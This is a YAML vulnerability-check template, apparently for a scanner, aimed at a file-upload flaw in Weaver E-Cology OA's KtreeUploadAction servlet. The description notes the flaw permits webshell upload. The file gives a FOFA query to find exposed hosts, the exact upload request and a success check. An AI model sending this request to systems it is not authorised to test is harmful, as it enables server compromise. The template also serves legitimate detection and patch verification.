product: 泛微 E-Cology
vName: 泛微E-Cology KtreeUploadAction文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 泛微OA E-Cology KtreeUploadAction 存在文件上传漏洞，攻击者可通过漏洞上传webshell，达到控制web服务器的权限
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /weaver/com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction?action=image
      cookie: Secure; JSESSIONID=abc6xLBV7S2jvgm3CB50w; Secure; testBanCookie=test
      file:
        test:
          - 52e039302a62d077.txt
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/octet-stream
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - text/html
            logic: and